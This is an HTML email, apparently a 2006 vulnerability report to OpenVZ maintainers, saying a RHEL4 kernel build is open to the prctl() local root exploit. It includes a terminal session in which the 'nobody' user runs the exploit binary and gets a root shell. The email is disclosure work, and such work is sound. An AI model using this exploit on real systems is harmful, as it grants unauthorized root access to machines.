<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=us-ascii">
<META content="MSHTML 6.00.2800.1561" name=GENERATOR></HEAD>
<BODY>
<DIV><FONT face=Arial size=2><SPAN
class=798423601-12102006>Hi,</SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2><SPAN
class=798423601-12102006></SPAN></FONT> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>
The latest RHEL4 kernel for OpenVZ (2.6.9-023stab016.2) available
at <A
href="http://openvz.org/download/kernel/rhel4/">http://openvz.org/download/kernel/rhel4/</A> <STRONG>is
vulnerable to the PRCTL exploit</STRONG>: <A
href="http://isc.sans.org/diary.php?storyid=1482">http://isc.sans.org/diary.php?storyid=1482</A></SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2><SPAN
class=798423601-12102006></SPAN></FONT> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>Example session of
"nobody" running the exploit and getting a root shell:</SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2><SPAN
class=798423601-12102006></SPAN></FONT> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>[root@mailin-02node
tmp]# uname -a<BR>Linux mailin-02node.elitehosts.com 2.6.9-023stab016.2 #1 Thu
Aug 10 23:39:42 MSD 2006 i686 i686 i386 GNU/Linux</SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>[root@mailin-02node
tmp]# su nobody<BR>bash-3.00$ ls -ld 05<BR>-rwxr-xr-x 1 nobody nobody
13298 Oct 11 21:42 05<BR>bash-3.00$ ./05</SPAN></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>prctl() suidsafe
exploit</SPAN></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>(C) Julien
TINNES</SPAN></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2><SPAN class=798423601-12102006>[+] Installed signal
handler<BR>[+] We are suidsafe dumpable!<BR>[+] Malicious string forged<BR>[+]
Segfaulting child<BR>[+] Waiting for exploit to succeed (~26 seconds)<BR>[+]
getting root shell<BR>sh-3.00# whoami<BR>root<BR>sh-3.00# uname -a<BR>Linux
mailin-02node.elitehosts.com 2.6.9-023stab016.2 #1 Thu Aug 10 23:41:42 MSD 2006
i686 i686 i386 GNU/Linux<BR>sh-3.00#</SPAN></FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>---------------------------</FONT></DIV>
<DIV><FONT face=Arial size=2>Avi Brender</FONT></DIV>
<DIV><FONT face=Arial size=2><A
href="mailto:abrender@elitehosts.com">abrender@elitehosts.com</A></FONT></DIV>
<DIV><FONT face=Arial size=2>Elite Hosts, Inc</FONT></DIV>
<DIV><FONT face=Arial
size=2>-------------------------------------------------------</FONT></DIV>
<DIV> </DIV></BODY></HTML>